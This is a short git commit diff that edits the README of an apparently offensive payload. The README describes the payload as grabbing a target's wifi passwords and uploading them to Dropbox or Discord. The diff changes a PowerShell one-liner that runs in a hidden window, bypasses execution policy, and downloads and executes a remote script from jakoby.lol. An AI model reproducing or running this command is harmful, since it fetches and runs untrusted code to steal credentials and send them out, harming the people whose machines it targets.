Update README.md
This commit is contained in:
parent
22f6d40108
commit
8f0eac23ff
1 changed files with 1 additions and 1 deletions
|
@ -37,7 +37,7 @@ This payload grabs your target's wifi passwords and uploads them to either Dropb
|
|||
Fill in either or both of these to methods to exfil your collected data
|
||||
|
||||
```
|
||||
powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/e8v | iex
|
||||
powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
|
||||
```
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
|
Loading…
Reference in a new issue